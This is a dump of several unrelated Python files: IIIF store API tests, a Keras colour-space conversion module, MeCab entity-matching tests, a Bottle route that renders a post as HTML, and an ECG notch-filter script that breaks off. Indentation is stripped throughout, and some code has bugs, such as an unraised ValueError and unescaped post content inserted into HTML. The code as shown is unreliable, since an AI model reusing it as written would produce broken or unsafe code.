def main(a, b, c, d, output, command, ndraws, nruns, nr, nb, lambdaa, lambdab, exponential_decay, truncation, interactive, linear_surprise, sqrt_surprise, partial_surprise, weighted_surprise, poisson, mixed):
print("Urn starting state: %s" % ((nr, nb),))
print("Urn parameters: %s" % urn_params)
urn = urn_class((nr, nb), urn_params)
commands[command](urn, ndraws, nruns, lambdaa, lambdab)
if interactive:
pylab.show()
else:
pylab.savefig(output)
if __name__ == "__main__":
main()
|
import copy
import json
import pytest
import requests
app_endpoint = "api/iiif_store"
test_headers = {"Content-Type": "application/json", "Accept": "application/json"}
test_data_store = {}
def test_iiif_store_api_root_get(http_service):
status = 200
response = requests.get(f"{http_service}/{app_endpoint}", headers=test_headers)
assert response.status_code == status
def test_iiif_store_api_iiif_list_empty(http_service):
test_endpoint = "iiif"
status = 200
response = requests.get(
f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
)
assert response.status_code == status
response_json = response.json()
assert response_json.get("count") == 0
assert response_json.get("next") == None
assert response_json.get("previous") == None
assert response_json.get("results") == []
def test_iiif_store_api_iiif_create_manifest(http_service, test_iiif3_manifest):
post_json = {
"iiif_json": test_iiif3_manifest,
"iiif_type": "Manifest",
}
test_endpoint = "iiif"
status = 201
response = requests.post(
f"{http_service}/{app_endpoint}/{test_endpoint}",
headers=test_headers,
json=post_json,
)
assert response.status_code == status
response_json = response.json()
assert response_json.get("id") is not None
test_data_store["test_manifest_uuid"] = response_json.get("id")
assert response_json.get("iiif_type") == post_json.get("iiif_type").lower()
assert response_json.get("original_id") == test_iiif3_manifest.get("id")
assert response_json.get("iiif_json").get("id") != test_iiif3_manifest.get("id")
assert response_json.get("label") == test_iiif3_manifest.get("label")
assert (
response_json.get("iiif_json").get("id")
== f"http://localhost:8000/iiif/manifest/{test_data_store.get('test_manifest_uuid')}/"
)
expected_manifest = copy.deepcopy(test_iiif3_manifest)
expected_manifest.pop("id")
response_json.get("iiif_json").pop("id")
assert response_json.get("iiif_json") == expected_manifest
def test_iiif_store_api_iiif_list(http_service, test_iiif3_manifest):
test_endpoint = "iiif"
status = 200
response = requests.get(
f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
)
assert response.status_code == status
response_json = response.json()
assert response_json.get("count") == 1
assert response_json.get("next") == None
assert response_json.get("previous") == None
assert len(response_json.get("results")) == 1
manifest = response_json["results"][0]
assert manifest.get("id") == test_data_store.get("test_manifest_uuid")
assert manifest.get("iiif_type") == "manifest"
assert manifest.get("original_id") == test_iiif3_manifest.get("id")
assert manifest.get("label") == test_iiif3_manifest.get("label")
assert manifest.get("thumbnail") == test_iiif3_manifest.get("thumbnail")
assert manifest.get("iiif_json") == None
def test_iiif_store_api_iiif_get(http_service, test_iiif3_manifest):
test_endpoint = f"iiif/{test_data_store.get('test_manifest_uuid')}"
status = 200
response = requests.get(
f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
)
assert response.status_code == status
response_json = response.json()
assert response_json.get("id") == test_data_store.get("test_manifest_uuid")
assert response_json.get("iiif_type") == "manifest"
assert response_json.get("original_id") == test_iiif3_manifest.get("id")
assert response_json.get("label") == test_iiif3_manifest.get("label")
assert response_json.get("thumbnail") == test_iiif3_manifest.get("thumbnail")
expected_manifest = copy.deepcopy(test_iiif3_manifest)
expected_manifest.pop("id")
manifest_id = response_json.get("iiif_json").pop("id")
assert (
manifest_id
== f"http://localhost:8000/iiif/manifest/{test_data_store.get('test_manifest_uuid')}/"
)
assert response_json.get("iiif_json") == expected_manifest
def test_iiif_store_public_iiif_list(http_service, test_iiif3_manifest):
test_endpoint = "iiif"
status = 200
response = requests.get(f"{http_service}/{test_endpoint}", headers=test_headers)
assert response.status_code == status
response_json = response.json()
assert response_json.get("count") == 1
assert response_json.get("next") == None
assert response_json.get("previous") == None
assert len(response_json.get("results")) == 1
manifest = response_json["results"][0]
assert manifest.get("iiif_type") == "manifest"
# assert manifest.get("url") == f"http://localhost:8000/iiif/manifest/{test_data_store.get('test_manifest_uuid')}/"
assert manifest.get("label") == test_iiif3_manifest.get("label")
assert manifest.get("thumbnail") == test_iiif3_manifest.get("thumbnail")
assert manifest.get("id") == None
assert manifest.get("iiif_json") == None
assert manifest.get("original_id") == None
def test_iiif_store_public_iiif_get(http_service, test_iiif3_manifest):
test_endpoint = f"iiif/manifest/{test_data_store.get('test_manifest_uuid')}"
status = 200
response = requests.get(f"{http_service}/{test_endpoint}", headers=test_headers)
assert response.status_code == status
response_json = response.json()
expected_manifest = copy.deepcopy(test_iiif3_manifest)
expected_manifest.pop("id")
manifest_id = response_json.pop("id")
assert (
manifest_id
== f"http://localhost:8000/iiif/manifest/{test_data_store.get('test_manifest_uuid')}/"
)
assert response_json == expected_manifest
def test_iiif_store_api_iiif_delete(http_service):
test_endpoint = f"iiif/{test_data_store.get('test_manifest_uuid')}"
status = 204
response = requests.delete(
f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
)
assert response.status_code == status
status = 404
response = requests.get(
f"{http_service}/{app_endpoint}/{test_endpoint}", headers=test_headers
)
assert response.status_code == status
|
<reponame>alexharvill/colorex
# Copyright 2021 <NAME>
# SPDX-License-Identifier: Apache-2.0
'colorex keras layers'
import tensorflow.keras as keras
import tensorflow.keras.backend as K
from colorex.cex_constants import (
REC_709_LUMA_WEIGHTS,
MAX_COMPONENT_VALUE,
SMALL_COMPONENT_VALUE,
XYZ_D65_2A_WHITEPOINT,
M_RGB_TO_XYZ_T,
M_XYZ_TO_RGB_T,
M_RGB_TO_YCBCR_T,
M_YCBCR_TO_RGB_T,
YCBCR_MIN,
YCBCR_YMAX,
YCBCR_CMAX,
YCBCR_OFFSET,
)
from colorex.cex_constants import S
import numpy as np
def srgb_to_rgb(srgb):
'convert from a gamma 2.4 color space to linear rgb'
srgb = K.clip(srgb, SMALL_COMPONENT_VALUE, MAX_COMPONENT_VALUE)
linear_mask = K.cast(srgb <= 0.04045, dtype='float32')
exponential_mask = K.cast(srgb > 0.04045, dtype='float32')
linear_pixels = srgb / 12.92
exponential_pixels = K.pow((srgb + 0.055) / 1.055, 2.4)
return linear_pixels * linear_mask + exponential_pixels * exponential_mask
def rgb_to_srgb(rgb):
'convert from linear rgb to a gamma 2.4 color space'
rgb = K.clip(rgb, SMALL_COMPONENT_VALUE, MAX_COMPONENT_VALUE)
linear_mask = K.cast(rgb <= 0.0031308, dtype='float32')
exponential_mask = K.cast(rgb > 0.0031308, dtype='float32')
linear_pixels = rgb * 12.92
exponential_pixels = 1.055 * K.pow(rgb, 1.0 / 2.4) - 0.055
return linear_pixels * linear_mask + exponential_pixels * exponential_mask
def rgb_to_xyz(rgb):
'convert from gamma 1.0 RGB color space to XYZ'
return K.dot(rgb, K.constant(M_RGB_TO_XYZ_T))
def xyz_to_rgb(xyz):
'convert from XYZ to a gamma 1.0 RGB color space'
return K.dot(xyz, K.constant(M_XYZ_TO_RGB_T))
def xyz_to_lab(xyz):
'convert from a CIEXYZ space to CIELa*b*'
xyz = xyz / K.constant(XYZ_D65_2A_WHITEPOINT)
xyz = K.clip(xyz, SMALL_COMPONENT_VALUE, MAX_COMPONENT_VALUE)
epsilon = 0.008856 #(6.0 / 29.0)**3 # use hardcoded value to match skimage for validation
linear_mask = K.cast(xyz <= epsilon, dtype='float32')
cuberoot_mask = K.cast(xyz > epsilon, dtype='float32')
linear_pixels = 7.787 * xyz + 16.0 / 116.0
cuberoot_pixels = K.pow(xyz, 1.0 / 3.0)
xyz = linear_pixels * linear_mask + cuberoot_pixels * cuberoot_mask
x, y, z = xyz[..., 0], xyz[..., 1], xyz[..., 2]
# Vector scaling
L = (116.0 * y) - 16.0
a = 500.0 * (x - y)
b = 200.0 * (y - z)
return K.stack([L, a, b], axis=-1)
def lab_to_xyz(lab):
'convert from lab to xyz color space assuming a D65 whitepoint + 2deg angle'
l, a, b = lab[..., 0], lab[..., 1], lab[..., 2]
y = (l + 16.0) / 116.0
x = (a / 500.0) + y
z = y - (b / 200.0)
z = K.clip(z, 0.0, 1e20)
xyz = K.stack([x, y, z], axis=-1)
epsilon = 6.0 / 29.0
linear_mask = K.cast(xyz < epsilon, dtype='float32')
cube_mask = K.cast(xyz >= epsilon, dtype='float32')
linear_pixels = (xyz - 16.0 / 116.) / 7.787
cube_pixels = K.pow(xyz, 3.0)
xyz = linear_pixels * linear_mask + cube_pixels * cube_mask
xyz = xyz * K.constant(XYZ_D65_2A_WHITEPOINT)
return xyz
def rgb_to_luminance(rgb, luma_weights=REC_709_LUMA_WEIGHTS):
'luminance of a color array, or higher dim color images'
r, g, b = rgb[..., 0], rgb[..., 1], rgb[..., 2]
return r * luma_weights[0] + g * luma_weights[1] + b * luma_weights[2]
def xyz_to_xyy(XYZ):
'''
convert from XYZ color space to xyY
XYZ: consistent units for each component
xyY: normalized chromaticity with xy in 0-1, Y in 0-inf
https://en.wikipedia.org/wiki/CIE_1931_color_space
http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_xyY.html
'''
X, Y, Z = XYZ[..., 0], XYZ[..., 1], XYZ[..., 2]
XYZ_sum = X + Y + Z
epsilon = 1.0 / 1000.0
unit_mask = K.cast(XYZ_sum < epsilon, dtype='float32')
XYZ_sum = unit_mask + (1.0 - unit_mask) * XYZ_sum
x = X / XYZ_sum
y = Y / XYZ_sum
return K.stack([x, y, Y], axis=-1)
def xyy_to_xyz(xyY):
'''
convert from xyY color space to XYZ
xyY: normalized chromaticity with xy in 0-1, Y in 0-inf
XYZ: consistent units for each component
https://en.wikipedia.org/wiki/CIE_1931_color_space
http://www.brucelindbloom.com/index.html?Eqn_xyY_to_XYZ.html
'''
x, y, Y = xyY[..., 0], xyY[..., 1], xyY[..., 2]
invalid_mask = K.cast(y < SMALL_COMPONENT_VALUE, dtype='float32')
valid_mask = 1.0 - invalid_mask
y = invalid_mask + valid_mask * y
norm = Y / y
X = x * norm
Z = (1 - x - y) * norm
X *= valid_mask
Y *= valid_mask
Z *= valid_mask
return K.stack([X, Y, Z], axis=-1)
def rgb_to_ycbcr(rgb):
'''
convert from rgb color space to YCbCr
rgb: rgb color space
YCbCr: luminance with 2 chroma channels
https://en.wikipedia.org/wiki/YCbCr
http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_xyY.html
'''
ycbcr = K.dot(rgb, K.constant(M_RGB_TO_YCBCR_T))
y, cb, cr = ycbcr[..., 0], ycbcr[..., 1], ycbcr[..., 2]
# y += YCBCR_MIN
# y -= YCBCR_MIN
y /= YCBCR_YMAX - YCBCR_MIN
cb += YCBCR_OFFSET
cb -= YCBCR_MIN
cb /= YCBCR_CMAX - YCBCR_MIN
cr += YCBCR_OFFSET
cr -= YCBCR_MIN
cr /= YCBCR_CMAX - YCBCR_MIN
return K.stack([y, cb, cr], axis=-1)
def ycbcr_to_rgb(ycbcr):
'''
convert from YCbCr color space to srgb
YCbCr: luminance with 2 chroma channels
srgb: rgb color space
https://en.wikipedia.org/wiki/YCbCr
http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_xyY.html
'''
y, cb, cr = ycbcr[..., 0], ycbcr[..., 1], ycbcr[..., 2]
y *= YCBCR_YMAX - YCBCR_MIN
# y += YCBCR_MIN
# y -= YCBCR_MIN
cb *= YCBCR_CMAX - YCBCR_MIN
cb += YCBCR_MIN
cb -= YCBCR_OFFSET
cr *= YCBCR_CMAX - YCBCR_MIN
cr += YCBCR_MIN
cr -= YCBCR_OFFSET
ycbcr = K.stack([y, cb, cr], axis=-1)
return K.dot(ycbcr, K.constant(M_YCBCR_TO_RGB_T))
#### following transforms are macros using the above primitive transforms
def xyz_to_srgb(xyz):
'xyz > rgb > srgb'
tmp = xyz_to_rgb(xyz)
return rgb_to_srgb(tmp)
def srgb_to_xyz(srgb):
'srgb > rgb > xyz'
tmp = srgb_to_rgb(srgb)
return rgb_to_xyz(tmp)
def srgb_to_lab(srgb):
'srgb -> xyz -> lab'
tmp = srgb_to_xyz(srgb)
return xyz_to_lab(tmp)
def lab_to_srgb(lab):
'lab > xyz > srgb'
tmp = lab_to_xyz(lab)
return xyz_to_srgb(tmp)
def rgb_to_lab(rgb):
'rgb -> xyz -> lab'
tmp = rgb_to_xyz(rgb)
return xyz_to_lab(tmp)
def lab_to_rgb(lab):
'lab > xyz > rgb'
tmp = lab_to_xyz(lab)
return xyz_to_rgb(tmp)
def rgb_to_xyy(rgb):
'rgb > xyz > xyy'
tmp = rgb_to_xyz(rgb)
return xyz_to_xyy(tmp)
def srgb_to_xyy(srgb):
'srgb > rgb > xyz > xyy'
tmp = srgb_to_rgb(srgb)
return rgb_to_xyy(tmp)
def lab_to_xyy(lab):
'lab > xyz > xyy'
tmp = lab_to_xyz(lab)
return xyz_to_xyy(tmp)
def xyy_to_rgb(xyy):
'xyy > xyz > rgb'
tmp = xyy_to_xyz(xyy)
return xyz_to_rgb(tmp)
def xyy_to_srgb(xyy):
'xyy > xyz > rgb > srgb'
tmp = xyy_to_rgb(xyy)
return rgb_to_srgb(tmp)
def xyy_to_lab(xyy):
'xyz > xyz > lab'
tmp = xyy_to_xyz(xyy)
return xyz_to_lab(tmp)
class Bias(keras.layers.Layer):
'simple layer for testing'
def __init__(self, **kwargs):
self.bias = None
super(Bias, self).__init__(**kwargs)
def build(self, input_shape):
'creates trainable weight variable for this bias layer'
self.bias = self.add_weight(
name='weights',
shape=(1,),
initializer='zeros',
trainable=True,
)
super(Bias, self).build(input_shape) # will set self.built = True
def call(self, inputs, **kwargs):
'builds an output tensor for this op'
return inputs + self.bias
TRANSFORMS = {
(S.SRGB, S.RGB): srgb_to_rgb,
(S.SRGB, S.XYZ): srgb_to_xyz,
(S.SRGB, S.LAB): srgb_to_lab,
(S.SRGB, S.LUM): None,
(S.SRGB, S.xyY): srgb_to_xyy,
(S.RGB, S.SRGB): rgb_to_srgb,
(S.RGB, S.XYZ): rgb_to_xyz,
(S.RGB, S.LAB): rgb_to_lab,
(S.RGB, S.LUM): rgb_to_luminance,
(S.RGB, S.xyY): rgb_to_xyy,
(S.RGB, S.YCbCr): rgb_to_ycbcr,
(S.XYZ, S.RGB): xyz_to_rgb,
(S.XYZ, S.LAB): xyz_to_lab,
(S.XYZ, S.SRGB): xyz_to_srgb,
(S.XYZ, S.LUM): None,
(S.XYZ, S.xyY): xyz_to_xyy,
(S.LAB, S.XYZ): lab_to_xyz,
(S.LAB, S.SRGB): lab_to_srgb,
(S.LAB, S.RGB): lab_to_rgb,
(S.LAB, S.LUM): None,
(S.LAB, S.xyY): lab_to_xyy,
(S.xyY, S.SRGB): xyy_to_srgb,
(S.xyY, S.RGB): xyy_to_rgb,
(S.xyY, S.XYZ): xyy_to_xyz,
(S.xyY, S.LAB): xyy_to_lab,
(S.xyY, S.LUM): None,
(S.YCbCr, S.RGB): ycbcr_to_rgb,
}
def color_space(from_space, to_space, values):
'''
lookup color transform from_space to_space
apply transform and return output tensor
short circuit compute if from_space == to_space
'''
if from_space == to_space:
result = values
else:
t = TRANSFORMS.get((from_space, to_space))
if t is None:
ValueError(f'bad transform[{from_space.name},{to_space.name}]')
result = t(values)
return result
def color_space_numpy(from_space, to_space, values):
'numpy wrapper for backend color transform'
result = color_space(from_space, to_space, K.constant(values))
if hasattr(result, 'numpy'):
result = result.numpy()
return result
class ColorSpace(keras.layers.Layer):
'convert from_space to_space'
def __init__(self, from_space, to_space, **kwargs):
self.from_space = S[from_space]
self.to_space = S[to_space]
super(ColorSpace, self).__init__(**kwargs)
def call(self, inputs, **kwargs):
'builds an output tensor for this op'
return color_space(self.from_space, self.to_space, inputs)
def get_config(self):
'save from and to attributes'
return dict(
super(ColorSpace, self).get_config(),
from_space=self.from_space.name,
to_space=self.to_space.name,
)
def compute_output_shape(self, input_shape):
'some transforms remove the color dimension'
result = input_shape
if self.to_space in (S.LUM,):
result = input_shape[:-1]
return result
|
import os
from mecab_value_extractor_dir.ner_intent_dir import utility_data, ner_string, ner_mecab
PARENT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
entity_dir_path = PARENT_DIR + "/data_dir/entity_mecab"
intent_dir_path = PARENT_DIR + "/data_dir/intent_mecab"
entity_filenames = os.listdir(entity_dir_path)
intent_filenames = os.listdir(intent_dir_path)
FILENAME_ONLY = 0
USER_SENTENCE = 1
ENTITY = 2
LARGE_CATEGORY = 1
SMALL_CATEGORY = 2
ENTITY_INTENT_CLASS = 0
ONLY_ONE_VALUE = 0
CATEGORY = 0
VALUE = 1
BLANK_LIST = []
def test_ner_string():
entity_list_path = PARENT_DIR + "/entity_dir/entity_dump/call_center_entity.txt"
csv_dir = PARENT_DIR + "/test_dir/call_center_data/call_center.csv"
write_dir = "tmp.csv"
e_s = ner_string.EntityString(entity_list_path)
is_same_cnt = 0
tmp_list = []
for idx, csv_item in enumerate(utility_data.read_csv(csv_dir)):
is_same = False
ner_list = e_s.get_entity_list(csv_item[USER_SENTENCE])
sentence, entity_contain_list = ner_list
entity_contain_list.sort()
csv_entity_list = [x.strip() for x in csv_item[2].split(",")]
csv_entity_list.sort()
if all(elem in entity_contain_list for elem in csv_entity_list):
print(idx, csv_item[USER_SENTENCE])
is_same_cnt += 1
is_same = True
tmp_list.append([csv_item[USER_SENTENCE], csv_item[ENTITY], ", ".join(entity_contain_list), ", ".join(csv_entity_list), is_same])
print(is_same_cnt, "/", len(utility_data.read_csv(csv_dir)))
utility_data.write_csv(write_dir, tmp_list)
def test_ner_mecab():
entity_list_path = PARENT_DIR + "/entity_dir/entity_dump/call_center_entity_mecab.txt"
csv_dir = PARENT_DIR + "/test_dir/call_center_data/call_center.csv"
write_dir = "tmp_mecab.csv"
e_m = ner_mecab.EntityMeCab(entity_list_path)
is_same_cnt = 0
tmp_list = []
for idx, csv_item in enumerate(utility_data.read_csv(csv_dir)):
is_same = False
ner_list = e_m.get_mecab_list(csv_item[USER_SENTENCE])
sentence, entity_contain_list = ner_list
entity_contain_list.sort()
csv_entity_list = [x.strip() for x in csv_item[2].split(",")]
csv_entity_list.sort()
if all(elem in entity_contain_list for elem in csv_entity_list):
print(idx, csv_item[USER_SENTENCE])
is_same_cnt += 1
is_same = True
tmp_list.append([csv_item[USER_SENTENCE], csv_item[ENTITY], ", ".join(entity_contain_list), ", ".join(csv_entity_list), is_same])
print(is_same_cnt, "/", len(utility_data.read_csv(csv_dir)))
utility_data.write_csv(write_dir, tmp_list)
def get_entity_intent(sentence):
entity_list = []
intent_list = []
# 1. 엔티티 매칭데이터 확인하기
for entity_search_list in entity_filenames:
data_copy = sentence
entity_data_path = os.path.join(entity_dir_path, entity_search_list)
e_m = ner_mecab.EntityMeCab(entity_data_path)
sentence_mecab_list, entity_contain_list = e_m.get_mecab_list(data_copy)
# 1-1.카테고리에 해당되는 엔티티가 있을 때 저장
if entity_contain_list != BLANK_LIST:
split_filename = os.path.splitext(entity_search_list)
file_name = split_filename[FILENAME_ONLY]
file_split_list = file_name.split("_")
entity_list.append(
[file_split_list[ENTITY_INTENT_CLASS], file_split_list[LARGE_CATEGORY], file_split_list[SMALL_CATEGORY],
entity_contain_list[ONLY_ONE_VALUE][VALUE]])
# 2. 인텐트 매칭 데이터 확인하기
for intent_search_list in intent_filenames:
data_copy = sentence
intent_data_path = os.path.join(intent_dir_path, intent_search_list)
i_m = ner_mecab.EntityMeCab(intent_data_path)
sentence_mecab_list, intent_contain_list = i_m.get_mecab_list(data_copy)
# 2-1.카테고리에 해당되는 엔티티가 있을 때 저장
if intent_contain_list != BLANK_LIST:
split_filename = os.path.splitext(intent_search_list)
file_name = split_filename[FILENAME_ONLY]
file_split_list = file_name.split("_")
intent_list.append([file_split_list[ENTITY_INTENT_CLASS], file_split_list[LARGE_CATEGORY], file_split_list[SMALL_CATEGORY],
intent_contain_list[ONLY_ONE_VALUE][CATEGORY]])
# 3. 같은 카테고리에 있는 엔티티 인텐트 매칭하기
for entity_item in entity_list:
for intent_item in intent_list:
if entity_item[LARGE_CATEGORY] == intent_item[LARGE_CATEGORY]:
return sentence, entity_item, intent_item
return False
def test_ner_intent():
example_data = "./entity_intent_example.txt"
data_parse_list = []
# 1. 예시 데이터 불러오기
for data_item in utility_data.read_txt(example_data)[:5]:
data_parse_list.append(get_entity_intent(data_item))
utility_data.write_csv("tmp.csv", data_parse_list)
if __name__ == "__main__":
import time
st = time.time()
test_ner_intent()
et = time.time()
print(et-st) |
# -*- coding: utf-8 -*-
import time
import logging
from bottle import route, response
from error import ApplicationError, PostNotExistError
from http import get_response, get_request
from utilities import TimeUtil
req_proto = {'num': int, } # 보고싶은 포스팅 번호
res_proto = {'code': int,
'msg': str, }
@route('/feed', method='GET')
def feed(app):
"""
rss link를 연결했을 때 화면을 보여 줍니다.
호출
http://localhost:8080/feed?num=1
결과
html 형식의 문서
"""
try:
req = get_request(req_proto)
try:
session = req['session']
readerid = str(session['userid'])
except:
# 세션이 없는 경우는 로그인 하지 않았으므로 public 글만 볼 수 있다.
readerid = None
num = int(req['num'])
with app.postdb() as db:
post = app.postmgr.get_post(db, num, readerid)
response.content_type = 'text/html'
if post:
url = "http://{0}".format(app.publichost)
html = _generate_html(url, post.num, post.wid, post.wnick, post.wtime, post.status, post.images, post.context)
else:
raise PostNotExistError("post not exist. readerid=%s, post_num=%s" % (readerid, num))
return html
except ApplicationError as e:
logging.debug(e)
return get_response(res_proto, e)
except Exception as e:
logging.exception(e)
def _get_top_menus(top_menus):
"""
top_menus = {"Forum": "http://localhost:8080/feed?num=1",
"Contact": "http://localhost:8080/feed?num=2",
"Test": "http://localhost:8080/feed?num=3"}
"""
return " | ".join(['<a href="{1}">{0}</a>'.format(k, v) for k, v in top_menus.iteritems()])
def _generate_html(url, num, userid, wnick, wtime, status, images, context):
print "wtime!!!!!!!!!!!!!!!!!!!!!!!!!", type(wtime), wtime
title = "TinyPost"
css_path = url + "/files/style.css"
date_img_path = url + "/files/timeicon.gif"
comment_img_path = url + "/files/comment.gif"
top_menus = {"Forum": url + "/feed?num=1",
"Contact": url + "/feed?num=2",
"Test": url + "/feed?num=3", }
comment_link = url + "/feed?num=4"
comment_count = 0
hrtime = TimeUtil.get_human_readable_time(time.mktime(time.strptime(wtime, "%Y-%m-%d %H:%M:%S")))
if status == 1:
post_type = "나의 포스팅"
elif status == 2:
post_type = "친구 공개 포스팅"
elif status == 3:
post_type = "전체 공개 포스팅"
else:
raise Exception("status is not valid. status" % (status,))
args = (title,
css_path,
_get_top_menus(top_menus),
title,
post_type,
"%s(%s)" % (userid, wnick),
context,
comment_img_path,
comment_link,
comment_count,
date_img_path,
hrtime,)
html = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>{0}</title>
<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<style type="text/css" media="all">
@import url({1});
</style>
</head>
<body>
<div id="page-container">
<div id="top"> {2}
<h1>{3}</h1>
</div>
<div id="content">
<div class="padding">
<h2>{4}</h2>
<br />
<h4><a href="#">{5}</a></h4>
<br />
{6}
<p class="date"><img src="{7}" alt="" /> <a href="{8}">Comments({9})</a> <img src="{10}" alt="" /> {11}.</p>
</div>
</div>
<div id="footer"> <a href="#">RSS Feed</a> | <a href="#">Contact</a> | <a href="#">Accessibility</a> | <a href="#">Products</a> | <a href="#">Disclaimer</a> | <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a> and <a href="http://validator.w3.org/check?uri=referer">XHTML</a> <br />
Copyright © 2014 Koo - Design: Green Grass <a href="http://www.free-css-templates.com"><NAME></a> </div>
</div>
</body>
</html>
""".format(*args)
return html
|
"""
main.py (Signal Processing of an ECG program)
The main module for the Signal Processing of an ECG program.
This module imports ECG data from a .txt and creates IIR and
FIR notch filters to reduce narrowband noise from the data.
Figures of the data, filtered data and filter responses are
produced. The noise power is calculated. All results are
saved in the current directory. This was first designed for
ENEL420 Assignment 1.
Authors: <NAME> (58979250)
<NAME> (23200856)
Last Modified: 27/12/2020
"""
# Imported libraries
from scipy.signal import freqz, lfilter, firwin, remez, firwin2, convolve, kaiserord
from scipy.fft import fft
import numpy as np
from signalPlots import *
from IIR import *
from FIR import *
from noise import calculateNoiseVariancePerFilter, saveNoisePowerData
from configFiles import importData
from config import *
def main():
"""Main function of the Signal Processing of an ECG program."""
# Gather data from input files
samples = importData(DATA_FILENAME) # Import data from file
base_time = getTimeData(SAMPLE_RATE, len(samples)) # Create a time array based on imported data
base_freq, base_freq_data = calcFreqSpectrum(samples, SAMPLE_RATE) # Calculate the frequency spectrum of the data
# Create and apply IIR filters to data
notch_num_1, notch_denom_1 = createIIRNotchFilter(CUTOFF_FREQS[0], NOTCH_WIDTH, PASSBAND_FREQ, SAMPLE_RATE) # Calculate the first notch filter's coefficents
notch_num_2, notch_denom_2 = createIIRNotchFilter(CUTOFF_FREQS[1], NOTCH_WIDTH, PASSBAND_FREQ, SAMPLE_RATE) # Calculate the second notch filter's coefficents
half_IIR_samples, IIR_samples = applyIIRNotchFilters(notch_num_1, notch_denom_1, notch_num_2, notch_denom_2, samples) # Apply cascaded notch filters to data
notch_time = getTimeData(SAMPLE_RATE, len(IIR_samples)) # Create a time array based on notch filtered data
notch_frequency, notch_freq_data = calcFreqSpectrum(IIR_samples, SAMPLE_RATE) # Calculate frequency of the IIR filtered ECG data
notched_numerator, notched_denominator = combineFilters(notch_num_1, notch_denom_1, notch_num_2, notch_denom_2) # Combine the two IIR notch filters
# Create and apply FIR window filters to data
window_filter_1, window_filter_2, window_filter_overall = createWindowFilters(CUTOFF_FREQS, SAMPLE_RATE, NOTCH_WIDTH, NUM_FIR_TAPS) # Calculate window filter coefficents
half_windowed_samples, full_windowed_samples, overall_windowed_samples = applyFIRFilters(window_filter_1, window_filter_2, window_filter_overall, samples) # Apply window filter to data
win_time = getTimeData(SAMPLE_RATE, len(full_windowed_samples)) # Create a time array based on window filtered data
win_frequency, win_freq_data = calcFreqSpectrum(overall_windowed_samples, SAMPLE_RATE) # Calculate frequency of the window IIR filtered ECG data
# Create and apply FIR optimal filters to data
optimal_filter_1, optimal_filter_2, optimal_filter_overall = createOptimalFilters(CUTOFF_FREQS, SAMPLE_RATE, NOTCH_WIDTH, NUM_FIR_TAPS)
half_optimal_samples, full_optimal_samples, overall_optimal_samples = applyFIRFilters(optimal_filter_1, optimal_filter_2, optimal_filter_overall, samples)
opt_time = getTimeData(SAMPLE_RATE, len(full_optimal_samples)) # Create a time array based on optimal filtered data
opt_frequency, opt_freq_data = calcFreqSpectrum(overall_optimal_samples, SAMPLE_RATE) # Calculate frequency of the window IIR filtered ECG data
# Create and apply FIR frequency sampling filters to data
freq_sampling_filter_1, freq_sampling_filter_2, freq_filter_overall = createFreqSamplingFilters(CUTOFF_FREQS, SAMPLE_RATE, NOTCH_WIDTH, NUM_FIR_TAPS)
half_freq_samples, full_freq_samples, overall_freq_samples = applyFIRFilters(freq_sampling_filter_1, freq_sampling_filter_2, freq_filter_overall, samples)
freq_sampling_time = getTimeData(SAMPLE_RATE, len(full_freq_samples)) # Create a time array based on optimal filtered data
freq_s_frequency, freq_s_freq_data = calcFreqSpectrum(overall_freq_samples, SAMPLE_RATE) # Calculate frequency of the window IIR filtered ECG data
# Plot unfiltered data
ECG = plotECG(samples, base_time) # Plot a time domain graph of the ECG data
ECGSpectrum = plotECGSpectrum(base_freq, base_freq_data) # Plot the frequency spectrum of the ECG data
# Plot IIR notch filtered data
IIRPoleZero = plotIIRPoleZero(CUTOFF_FREQS, NOTCH_WIDTH, SAMPLE_RATE) # Plot a pole-zero plot of the created IIR notch filter
IIRNotchECG = plotIIRNotchECG(IIR_samples, notch_time) # Plot a time domain graph of the IIR notch filtered ECG data
IIRNotchECGSpectrum = plotIIRNotchECGSpectrum(notch_frequency, notch_freq_data) # Plot the frequency spectrum of the IIR notch filtered ECG data
IIRNotchFilterResponse = plotIIRNotchFilterResponse(notched_numerator, notched_denominator, SAMPLE_RATE) # Plot the frequency response of the notch filter
# Plot window filtered data
WindowedECG = plotWindowedECG(overall_windowed_samples, win_time) # Plot a time domain graph of the window filtered ECG data
WindowedECGSpectrum = plotWindowedECGSpectrum(win_frequency, win_freq_data) # Plot the frequency spectrum of the window filtered ECG data
WindowFilterResponse = plotWindowFilterResponse(window_filter_overall, SAMPLE_RATE) # Plot the frequency response of the window filter
#Plot optimal filtered data
OptimalECG = plotOptimalECG(overall_optimal_samples, opt_time) # Plot a time domain graph of the optimal filtered ECG data
OptimalECGSpectrum = plotOptimalECGSpectrum(opt_frequency, opt_freq_data) # Plot the frequency spectrum of the optimal filtered ECG data
OptimalFilterResponse = plotOptimalFilterResponse(optimal_filter_overall, SAMPLE_RATE) # Plot the frequency response of the optimal filter
#Plot Frequency Sampling filtered data
FrequencySamplingECG = plotFrequencySampledECG(overall_freq_samples, freq_sampling_time) # Plot a time domain graph of the frequency sampling filtered ECG data
FrequencySamplingECGSpectrum = plotFrequencySampledECGSpectrum(freq_s_frequency, freq_s_freq_data) # Plot the frequency spectrum of the frequency sampling filtered ECG data
FrequencySamplingFilterResponse = plotFrequencySampledFilterResponse(freq_filter_overall, SAMPLE_RATE) # Plot the frequency response of the frequency sampling filter
# Save figures
figures = [ECG, ECGSpectrum, IIRPoleZero, IIRNotchECG, IIRNotchECGSpectrum, IIRNotchFilterResponse, WindowedECG,
WindowedECGSpectrum, WindowFilterResponse, OptimalECG, OptimalECGSpectrum, OptimalFilterResponse,
FrequencySamplingECG, FrequencySamplingECGSpectrum, FrequencySamplingFilterResponse] # The figures to save, which must be in the same order as figure_names
saveFigures(figures, FIGURES_FOLDER_NAME, FIGURE_NAMES) # Save the figures to an output folder in the current directory
# Calculate the variance of filtered data
